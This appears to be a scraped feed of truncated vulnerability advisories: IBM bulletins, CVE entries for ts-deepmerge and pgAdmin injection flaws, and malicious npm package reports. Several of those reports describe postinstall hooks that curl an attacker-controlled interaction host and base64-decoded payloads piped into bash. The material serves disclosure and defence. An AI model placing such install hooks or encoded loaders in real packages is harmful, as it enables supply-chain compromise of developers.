Security Bulletin: Multiple vulnerabilities affect IBM Db2® on Cloud Pak for Data, and Db2 Warehouse on Cloud Pak for Data.

Summary IBM has released the below fix for IBM Db2® on Cloud Pak for Data and Db2 Warehouse on Cloud Pak for Data in response to multiple vulnerabilities found in multiple components. This bulletin identifies the steps to take to address the vulnerabilities. Vulnerability Details...

Security Bulletin: Multiple Vulnerabilities affect IBM Decision Optimization for Cloud Pak for Data.

Summary Multiple Vulnerabilities were addressed in IBM Decision Optimization for Cloud Pak for Data version 5.3.1 patch 6 Vulnerability Details CVEID:CVE-2026-34477 DESCRIPTION: The fix for CVE-2025-68161 https://logging.apache.org/security.htmlCVE-2025-68161 was incomplete: it addressed hostname...

Security Bulletin: Multiple vulnerabilities in IBM MQ Operator and Queue manager container images

Summary Multiple vulnerabilities were addressed in IBM MQ Operator and Queue manager container images Vulnerability Details CVEID:CVE-2026-27142 DESCRIPTION: Actions which insert URLs into the content attribute of HTML meta tags are not escaped. This can allow XSS if the meta tag also has an...

re

⚡ REVERSE ENGINEERING & BINARY EXPLOITATION ⚡ Welcome to my p...

Security Bulletin: IBM Verify Identity Protection Self-Hosted is affected by multiple vulnerabilities

Summary Security Vulnerabilities were addressed in IBM Verify Identity Protection Self-Hosted Vulnerability Details CVEID:CVE-2025-66418 DESCRIPTION: urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression...

CVE-2026-12644

Versions of the package ts-deepmerge before 8.0.0 are vulnerable to Uncaught Exception due to the improper handling of built-in Object.prototype methods such as toString, valueOf. When user-controlled input contains these keys with non-function values, the resulting merged object becomes broken —...

imagemagick-gs-delegate-hijack-poc

ImageMagick Ghostscript Delegate Search Path PoC This reposit...

CVE-2026-12644

Versions of the package ts-deepmerge before 8.0.0 are vulnerable to Uncaught Exception due to the improper handling of built-in Object.prototype methods such as toString, valueOf. When user-controlled input contains these keys with non-function values, the resulting merged object becomes broken —...

CVE-2026-12644

The CVE affects ts-deepmerge before version 8.0.0. The vulnerability stems from improper handling of built-in Object.prototype methods (e.g., toString, valueOf) during merging. If user-controlled input supplies these keys with non-function values, the merged object can break and throw a TypeError...

CVE-2026-12644

Versions of the package ts-deepmerge before 8.0.0 are vulnerable to Uncaught Exception due to the improper handling of built-in Object.prototype methods such as toString, valueOf. When user-controlled input contains these keys with non-function values, the resulting merged object becomes broken —...

EUVD-2026-37991

Versions of the package ts-deepmerge before 8.0.0 are vulnerable to Uncaught Exception due to the improper handling of built-in Object.prototype methods such as toString, valueOf. When user-controlled input contains these keys with non-function values, the resulting merged object becomes broken —...

Malicious code in electron-internal-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef On npm install, package.json's postinstall script executes curl http://9ph8dp.ceye.io, an out-of-band DNS/HTTP interaction service controlled by the...

MAL-2026-6186 Malicious code in electron-internal-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef On npm install, package.json's postinstall script executes curl http://9ph8dp.ceye.io, an out-of-band DNS/HTTP interaction service controlled by the...

Malicious code in eyee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 743696e9409c97e89816b050f0346b86446464fdbaeead6ae49ddabf50a082ba On require/run, eyee auto-executes main package.json sets main=cdpinject.js and the bottom of the file invokes main unless --stop/--detach is passed...

MAL-2026-6189 Malicious code in eyee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 743696e9409c97e89816b050f0346b86446464fdbaeead6ae49ddabf50a082ba On require/run, eyee auto-executes main package.json sets main=cdpinject.js and the bottom of the file invokes main unless --stop/--detach is passed...

Malicious code in mjs-eslint-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3320fa37492448acdf24a86f8a8735a3fc4d3b329ad156e299a8089df39e2f28 The package decodes base64 string literals via Buffer.from..., 'base64'.toString and pipes the resulting content into execSync'bash...' and...

MAL-2026-6190 Malicious code in mjs-eslint-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3320fa37492448acdf24a86f8a8735a3fc4d3b329ad156e299a8089df39e2f28 The package decodes base64 string literals via Buffer.from..., 'base64'.toString and pipes the resulting content into execSync'bash...' and...

SUSE CVE-2026-6040

A heap use-after-free existed when importing the blank-width characters of an ODF number format. A position value read from the document was not checked against the length of the format-code string, so a malformed number format could be processed against memory outside that string. In fixed...

EUVD-2026-37967

HTML injection in pgAdmin 4's cloud deployment module. The verifycredentials, deploy, regions, and update-server endpoints under /rds/, /azure/, /google/, and the top-level /cloud/ blueprint propagated AWS / Azure / Google SDK exception text — and the related file-resolution and database-commit...

EUVD-2026-37964

SQL injection in pgAdmin 4's named restore point endpoint POST /browser/server/restorepoint/gid/sid. The user-supplied 'value' field was interpolated directly into the SQL string with str.format instead of being passed as a bound parameter, allowing an authenticated pgAdmin user with a connected...